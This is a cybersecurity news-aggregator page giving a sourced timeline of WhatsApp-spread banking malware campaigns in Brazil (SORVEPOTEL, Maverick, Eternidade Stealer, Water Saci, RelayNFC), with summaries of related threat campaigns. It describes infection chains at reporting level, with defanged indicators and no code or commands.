CyberHappenings logo
Home Browse About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

SORVEPOTEL, Maverick, and Eternidade Stealer Malware Campaigns Target Brazilian Banks via WhatsApp

First reported
Last updated
2 unique sources, 5 articles

Summary

Hide ▲

A self-spreading malware named SORVEPOTEL targets Brazilian users via WhatsApp. The malware spreads through phishing messages containing malicious ZIP files, primarily affecting Windows systems. The campaign is designed for rapid propagation rather than data theft or ransomware. The malware exploits the trust in WhatsApp to spread across contacts and groups, leading to account bans for excessive spam. The majority of infections are concentrated in Brazil, impacting various sectors including government, public service, and technology. The malware uses a Windows shortcut (LNK) file to execute a PowerShell script, which retrieves the main payload and establishes persistence on the infected system. It also communicates with a command-and-control (C2) server for further instructions. New findings reveal that SORVEPOTEL is linked to a banking malware called Maverick, which targets Brazilian banks and monitors active browser window tabs for URLs matching financial institutions. The malware uses IMAP connections to terra.com[.]br email accounts using hardcoded email credentials to retrieve commands and implements a sophisticated remote control mechanism that allows the adversary to pause, resume, and monitor the WhatsApp propagation in real-time. A newly identified banking Trojan known as Eternidade Stealer has been observed pushing Brazil’s cybercrime ecosystem into a more aggressive phase, with attackers using WhatsApp as both an entry point and a propagation tool. The malware combines a WhatsApp-propagating worm, a Delphi-based stealer, and an MSI dropper to harvest financial data, system details, and contact lists. The campaign leverages a combination of social engineering and WhatsApp hijacking to distribute the trojan, using an obfuscated Visual Basic Script to drop a batch script that delivers two payloads: a Python script for WhatsApp Web-based dissemination and an MSI installer for Eternidade Stealer. The malware harvests a victim's entire contact list, filters out groups, business contacts, and broadcast lists, and sends a malicious attachment to all contacts. The MSI installer drops several payloads, including an AutoIt script that checks if the compromised system is based in Brazil by inspecting the operating system language. The script scans running processes and registry keys to ascertain the presence of installed security products and profiles the machine, sending details to a C2 server. The malware injects the Eternidade Stealer payload into 'svchost.exe' using process hollowing. Eternidade Stealer continuously scans active windows and running processes for strings related to banking portals, payment services, and cryptocurrency exchanges and wallets. The malware uses a terra.com[.]br email address to fetch C2 details, mirroring a tactic recently adopted by Water Saci. The campaign's backend was traced to two panels, one for managing the Redirector System and another login panel, used to monitor infected hosts. The threat actor Water Saci is using a sophisticated, highly layered infection chain that uses HTML Application (HTA) files and PDFs to propagate a worm that deploys a banking trojan via WhatsApp in attacks targeting users in Brazil. The latest wave is characterized by the attackers shifting from PowerShell to a Python-based variant that spreads the malware in a worm-like manner over WhatsApp Web. The PDF lure instructs victims to update Adobe Reader by clicking on an embedded link. Users who receive HTA files are deceived into executing a Visual Basic Script immediately upon opening, which then runs PowerShell commands to fetch next-stage payloads from a remote server, an MSI installer for the trojan and a Python script that's responsible for spreading the malware via WhatsApp Web. The MSI installer serves as a conduit for delivering the banking trojan using an AutoIt script. The script also runs checks to ensure that only one instance of the trojan is running at any given point of time. The script verifies the presence of a marker file named "executed.dat." If it does not exist, the script creates the file and notifies an attacker-controlled server ("manoelimoveiscaioba[.]com"). The script analyzes the user's Google Chrome browsing history to search visits to banking websites, specifically a hard-coded list comprising Santander, Banco do Brasil, Caixa Econômica Federal, Sicredi, and Bradesco. The script then proceeds to another critical reconnaissance step that involves checking for installed antivirus and security software, as well as harvesting detailed system metadata. The main functionality of the malware is to monitor open windows and extract their window titles to compare them against a list of banks, payment platforms, exchanges, and cryptocurrency wallets. If any of these windows contain keywords related to targeted entities, the script looks for a TDA file dropped by the installer and decrypts and injects it into a hollowed "svchost.exe" process, following which the loader searches for an additional DMP file containing the banking trojan. The banking trojan deployed is not Maverick, but rather a malware that exhibits structural and behavioral continuity with Casbaneiro. The trojan carries out "aggressive" anti-virtualization checks to sidestep analysis and detection, and gathers host information through Windows Management Instrumentation (WMI) queries. The trojan makes Registry modifications to set up persistence and establishes contact with a C2 server ("serverseistemasatu[.]com") to send the collected details and receive backdoor commands that grant remote control over the infected system. The trojan forcibly terminates several browsers to force victims to reopen banking sites under "attacker-controlled conditions." The second aspect of the campaign is the use of a Python script, an enhanced version of its PowerShell predecessor, to enable malware delivery to every contact via WhatsApp Web sessions using the Selenium browser automation tool. There is "compelling" evidence to suggest that Water Saci may have used a large language model (LLMs) or code-translation tool to port their propagation script from PowerShell to Python, given the functional similarities between the two versions and the inclusion of emojis in console outputs. The development comes as Brazilian banking users are also being targeted by a previously undocumented Android malware dubbed RelayNFC that's designed to carry out Near-Field Communication (NFC) relay attacks and siphon contactless payment data. RelayNFC implements a full real-time APDU relay channel, allowing attackers to complete transactions as though the victim's card were physically present. The malware is built using React Native and Hermes bytecode, which complicates static analysis and helps evade detection. Primarily spread via phishing, the attack makes use of decoy Portuguese-language sites (e.g., "maisseguraca[.]site") to trick users into installing the malware under the pretext of securing their payment cards. The end goal of the campaign is to capture the victim's card details and relay them to attackers, who can then perform fraudulent transactions using the stolen data. The cybersecurity company said its investigation also uncovered a separate phishing site ("test.ikotech[.]online") that distributes an APK file with a partial implementation of Host Card Emulation (HCE), indicating that the threat actors are experimenting with different NFC relay techniques.

Timeline

  1. 03.12.2025 17:32 1 articles · 23h ago

    Water Saci Uses Sophisticated Infection Chain to Deploy Banking Trojan

    The threat actor Water Saci is using a sophisticated, highly layered infection chain that uses HTML Application (HTA) files and PDFs to propagate a worm that deploys a banking trojan via WhatsApp in attacks targeting users in Brazil. The latest wave is characterized by the attackers shifting from PowerShell to a Python-based variant that spreads the malware in a worm-like manner over WhatsApp Web. The PDF lure instructs victims to update Adobe Reader by clicking on an embedded link. Users who receive HTA files are deceived into executing a Visual Basic Script immediately upon opening, which then runs PowerShell commands to fetch next-stage payloads from a remote server, an MSI installer for the trojan and a Python script that's responsible for spreading the malware via WhatsApp Web. The MSI installer serves as a conduit for delivering the banking trojan using an AutoIt script. The script also runs checks to ensure that only one instance of the trojan is running at any given point of time. The script verifies the presence of a marker file named "executed.dat." If it does not exist, the script creates the file and notifies an attacker-controlled server ("manoelimoveiscaioba[.]com"). The script analyzes the user's Google Chrome browsing history to search visits to banking websites, specifically a hard-coded list comprising Santander, Banco do Brasil, Caixa Econômica Federal, Sicredi, and Bradesco. The script then proceeds to another critical reconnaissance step that involves checking for installed antivirus and security software, as well as harvesting detailed system metadata. The main functionality of the malware is to monitor open windows and extract their window titles to compare them against a list of banks, payment platforms, exchanges, and cryptocurrency wallets. If any of these windows contain keywords related to targeted entities, the script looks for a TDA file dropped by the installer and decrypts and injects it into a hollowed "svchost.exe" process, following which the loader searches for an additional DMP file containing the banking trojan. The banking trojan deployed is not Maverick, but rather a malware that exhibits structural and behavioral continuity with Casbaneiro. The trojan carries out "aggressive" anti-virtualization checks to sidestep analysis and detection, and gathers host information through Windows Management Instrumentation (WMI) queries. The trojan makes Registry modifications to set up persistence and establishes contact with a C2 server ("serverseistemasatu[.]com") to send the collected details and receive backdoor commands that grant remote control over the infected system. The trojan forcibly terminates several browsers to force victims to reopen banking sites under "attacker-controlled conditions." The second aspect of the campaign is the use of a Python script, an enhanced version of its PowerShell predecessor, to enable malware delivery to every contact via WhatsApp Web sessions using the Selenium browser automation tool. There is "compelling" evidence to suggest that Water Saci may have used a large language model (LLMs) or code-translation tool to port their propagation script from PowerShell to Python, given the functional similarities between the two versions and the inclusion of emojis in console outputs.

    Show sources
    Open in new tab
  2. 03.12.2025 17:32 1 articles · 23h ago

    RelayNFC Android Malware Targets Brazilian Banking Users

    The development comes as Brazilian banking users are also being targeted by a previously undocumented Android malware dubbed RelayNFC that's designed to carry out Near-Field Communication (NFC) relay attacks and siphon contactless payment data. RelayNFC implements a full real-time APDU relay channel, allowing attackers to complete transactions as though the victim's card were physically present. The malware is built using React Native and Hermes bytecode, which complicates static analysis and helps evade detection. Primarily spread via phishing, the attack makes use of decoy Portuguese-language sites (e.g., "maisseguraca[.]site") to trick users into installing the malware under the pretext of securing their payment cards. The end goal of the campaign is to capture the victim's card details and relay them to attackers, who can then perform fraudulent transactions using the stolen data. The cybersecurity company said its investigation also uncovered a separate phishing site ("test.ikotech[.]online") that distributes an APK file with a partial implementation of Host Card Emulation (HCE), indicating that the threat actors are experimenting with different NFC relay techniques.

    Show sources
    Open in new tab
  3. 19.11.2025 17:00 3 articles · 15d ago

    Eternidade Stealer Trojan Targets Brazilian Financial Institutions

    The campaign leverages a combination of social engineering and WhatsApp hijacking to distribute the trojan, using an obfuscated Visual Basic Script to drop a batch script that delivers two payloads: a Python script for WhatsApp Web-based dissemination and an MSI installer for Eternidade Stealer. The Python script establishes communication with a remote server and uses WPPConnect to automate the sending of messages in hijacked accounts via WhatsApp. The malware harvests a victim's entire contact list, filters out groups, business contacts, and broadcast lists, and sends a malicious attachment to all contacts. The MSI installer drops several payloads, including an AutoIt script that checks if the compromised system is based in Brazil by inspecting the operating system language. The script scans running processes and registry keys to ascertain the presence of installed security products and profiles the machine, sending details to a C2 server. The malware injects the Eternidade Stealer payload into 'svchost.exe' using process hollowing. Eternidade Stealer continuously scans active windows and running processes for strings related to banking portals, payment services, and cryptocurrency exchanges and wallets. The malware uses a terra.com[.]br email address to fetch C2 details, mirroring a tactic recently adopted by Water Saci. The campaign's backend was traced to two panels, one for managing the Redirector System and another login panel, used to monitor infected hosts.

    Show sources
    Open in new tab
  4. 11.11.2025 20:37 3 articles · 22d ago

    SORVEPOTEL Linked to Maverick Banking Malware

    New findings reveal that SORVEPOTEL is linked to a banking malware called Maverick, which targets Brazilian banks and monitors active browser window tabs for URLs matching financial institutions. The malware uses IMAP connections to terra.com[.]br email accounts using hardcoded email credentials to retrieve commands and implements a sophisticated remote control mechanism that allows the adversary to pause, resume, and monitor the WhatsApp propagation in real-time.

    Show sources
    Open in new tab
  5. 03.10.2025 15:02 4 articles · 2mo ago

    SORVEPOTEL Malware Spreads via WhatsApp in Brazil

    A self-spreading malware named SORVEPOTEL targets Brazilian users via WhatsApp. The malware spreads through phishing messages containing malicious ZIP files, primarily affecting Windows systems. The campaign is designed for rapid propagation rather than data theft or ransomware. The malware exploits the trust in WhatsApp to spread across contacts and groups, leading to account bans for excessive spam. The majority of infections are concentrated in Brazil, impacting various sectors including government, public service, and technology. The malware uses a Windows shortcut (LNK) file to execute a PowerShell script, which retrieves the main payload and establishes persistence on the infected system. It also communicates with a command-and-control (C2) server for further instructions.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Chinese State-Sponsored Group Exploits Windows Zero-Day in Espionage Campaign Against European Diplomats

A China-linked hacking group, UNC6384 (Mustang Panda), is exploiting a Windows zero-day vulnerability (CVE-2025-9491) to target European diplomats in Hungary, Belgium, Italy, the Netherlands, and Serbian government agencies. The campaign involves spearphishing emails with malicious LNK files to deploy the PlugX RAT and gain persistence on compromised systems. The attacks have broadened in scope to include diplomatic entities from Italy and the Netherlands. The zero-day vulnerability allows for remote code execution on targeted Windows systems, enabling the group to monitor diplomatic communications and steal sensitive data. Microsoft has not yet released a patch for this vulnerability, which has been heavily exploited by multiple state-sponsored groups and cybercrime gangs since March 2025. Microsoft has silently mitigated the vulnerability by changing LNK files in the November updates to display all characters in the Target field, not just the first 260. ACROS Security has also released an unofficial patch to limit shortcut target strings to 260 characters and warn users about potential dangers.

Open in new tab

Russian Sandworm Group Targets Ukrainian Organizations with Data-Wiping Malware and LotL Tactics

Russian threat actors, specifically the Sandworm group, have targeted Ukrainian organizations, including a business services firm, a local government entity, and the grain sector, using living-off-the-land (LotL) tactics and dual-use tools to maintain persistent access and exfiltrate sensitive data. The attacks, which began in June 2025, involved minimal malware to reduce detection and included the use of web shells and legitimate tools for reconnaissance and data theft. The threat actors exploited unpatched vulnerabilities to deploy web shells on public-facing servers, gaining initial access. They then used various tactics, including PowerShell commands, scheduled tasks, and legitimate software, to evade detection and perform reconnaissance. The attacks were characterized by the use of legitimate tools and minimal malware, demonstrating the actors' deep knowledge of Windows native tools. In addition to LotL tactics, Sandworm deployed multiple data-wiping malware families in June and September 2025, targeting Ukraine's education, government, and grain sectors. The grain sector, a vital economic sector, was targeted to disrupt Ukraine's war economy. The data-wiping malware used included ZeroLot and Sting, with initial access achieved by UAC-0099, who then transferred access to APT44 for wiper deployment. The activity is confirmed to be of Russian origin, with specific attribution to the Sandworm group. A new Russia-aligned threat activity cluster, InedibleOchotense, impersonated ESET in phishing attacks targeting Ukrainian entities starting in May 2025. This campaign involved sending spear-phishing emails and Signal text messages containing links to trojanized ESET installers, which delivered the Kalambur backdoor. InedibleOchotense is linked to the Sandworm (APT44) hacking group and has been observed conducting destructive campaigns in Ukraine, including the deployment of wiper malware ZEROLOT and Sting. Another Russia-aligned threat actor, RomCom, launched spear-phishing campaigns in mid-July 2025 exploiting a WinRAR vulnerability (CVE-2025-8088) targeting various sectors in Europe and Canada. RomCom also targeted a U.S.-based civil engineering company via a JavaScript loader dubbed SocGholish to deliver the Mythic Agent. The activity has been attributed with medium-to-high confidence to Unit 29155 of Russia's Main Directorate of the General Staff of the Armed Forces of the Russian Federation, also known as GRU. The targeted entity had worked for a city with close ties to Ukraine in the past. The ESET report noted that other Russian-aligned APT groups also maintained their focus on Ukraine and countries with strategic ties to Ukraine, while also expanding their operations to European entities. Gamaredon remained the most active APT group targeting Ukraine, with a noticeable increase in intensity and frequency of its operations during the reported period. Gamaredon selectively deployed one of Turla’s backdoors, indicating a rare instance of cooperation between Russia-aligned APT groups. Gamaredon’s toolset continued to evolve, incorporating new file stealers or tunneling services.

Open in new tab

Herodotus Android malware evades detection with human-like typing

A new Android malware family, Herodotus, uses random typing delays to mimic human behavior and evade detection by security software. The malware is offered as a service to financially motivated cybercriminals and is currently targeting Italian and Brazilian users through SMS phishing. Herodotus bypasses Accessibility permission restrictions in Android 13 and later, allowing it to interact with the user interface and steal sensitive information. The malware includes a 'humanizer' mechanism that introduces random delays in text input to avoid detection by behavioral anti-fraud solutions. It also features a control panel for custom SMS texts, overlay pages for credential theft, and SMS stealing for two-factor authentication interception. Herodotus is spread by multiple threat actors, with seven distinct subdomains detected. The malware is under active development and targets financial organizations in the U.S., Turkey, the U.K., and Poland, along with cryptocurrency wallets and exchanges. It is designed to perform device takeover (DTO) attacks and can steal two-factor authentication (2FA) codes sent via SMS, intercept screen content, grab the lockscreen PIN or pattern, and install remote APK files.

Open in new tab

Flax Typhoon APT Group Exploits ArcGIS for Persistent Access

The Flax Typhoon APT group, also tracked as Ethereal Panda and RedJuliett, exploited a legitimate ArcGIS application to establish a persistent backdoor for over a year. The attack involved modifying the ArcGIS server’s Java server object extension (SOE) to function as a web shell, enabling command execution, lateral movement, and data exfiltration. The malicious SOE persisted even after remediation and patching, highlighting the need for proactive threat hunting and treating all public-facing applications as high-risk assets. The group targeted a public-facing ArcGIS server connected to an internal server, compromising a portal administrator account and deploying a malicious SOE. They used a base64-encoded payload and a hardcoded key to execute commands and upload a renamed SoftEther VPN executable for long-term access. The attack targeted IT staff workstations within the scanned subnet, demonstrating the potential for significant operational disruption and data exposure. The attackers used a public-facing ArcGIS server connected to a private, internal ArcGIS server for backend computations, a common default configuration. They sent disguised commands to the portal server, creating a hidden system directory that became Flax Typhoon's private workspace. The attackers ensured the compromised component was included in system backups, turning the organization's own recovery plan into a guaranteed method of reinfection. ReliaQuest worked with the customer organization and Esri to fully evict Flax Typhoon actors from the environment, which included rebuilding the entire server stack and deploying custom detections for the threat activity. ReliaQuest urged organizations to treat all public-facing applications as high-risk assets and recommended security teams audit and harden such applications. The researchers also highlighted the need for behavioral analytics to complement signature-based detection, as Flax Typhoon did not use any malware or known malicious files. Strong credential hygiene was emphasized, noting that a weak administrator password gave the attackers a foothold in the organization's network. ReliaQuest recommended implementing multifactor authentication and practicing the principle of least privilege to enhance security. The ArcGIS geographic information system (GIS) is developed by Esri and supports server object extensions (SOE) that can extend basic functionality. The software is used by municipalities, utilities, and infrastructure operators to manage spatial and geographic data through maps. Researchers at cybersecurity company ReliaQuest have moderate confidence that the threat actor is Flax Typhoon. The attackers used valid administrator credentials to log into a public-facing ArcGIS server linked to a private, internal ArcGIS server. The malicious SOE accepted base64-encoded commands through a REST API parameter (layer) and executed them on the internal ArcGIS server. The exchange was protected by a hardcoded secret key, ensuring only the attackers had access to this backdoor. The attackers downloaded and installed SoftEther VPN Bridge, registering it as a Windows service that started automatically. The VPN established an outbound HTTPS tunnel to the attacker's server at 172.86.113[.]142, linking the victim's internal network to the threat actor's machine. The VPN used normal HTTPS traffic on port 443, blending with legitimate traffic, and remained active even if the SOE was detected and deleted. The attackers scanned the local network, moved laterally, accessed internal hosts, dumped credentials, or exfiltrated data using the VPN connection. The attackers targeted two workstations belonging to the target organization's IT staff, attempting to dump the Security Account Manager (SAM) database, security registry keys, and LSA secrets. Flax Typhoon is known for espionage campaigns to establish long-term, stealthy access through legitimate software. The FBI linked Flax Typhoon to the massive "Raptor Train" botnet, impacting the U.S. The Treasury's Office of Foreign Assets Control (OFAC) sanctioned companies that supported the state-sponsored hackers. Esri confirmed this is the first time an SOE has been used this way and will update their documentation to warn users of the risk of malicious SOEs. The attackers used the JavaSimpleRESTSOE ArcGIS extension to invoke a REST operation to run commands on the internal server via the public portal. The attackers specifically targeted two workstations belonging to IT personnel to obtain credentials and further burrow into the network. The attackers reset the password of the administrative account.

Open in new tab

TA585 Using MonsterV2 in Phishing Campaigns

TA585, a sophisticated threat actor, has been actively delivering the MonsterV2 malware via phishing campaigns since February 2025. The group manages its own infrastructure and employs multiple delivery techniques, including IRS and SBA-themed lures, malicious JavaScript injections, and fake CAPTCHA verifications. MonsterV2, also known as Aurotun Stealer, is a versatile malware capable of stealing sensitive data, acting as a clipper, establishing remote control, and executing commands from a C2 server. The malware is sold by a Russian-speaking actor and is typically packed using a C++ crypter called SonicCrypt to evade detection. TA585's campaigns have also included GitHub-themed lures and the distribution of other malware, such as Rhadamanthys. MonsterV2 avoids infecting systems in Commonwealth of Independent States (CIS) countries.

Open in new tab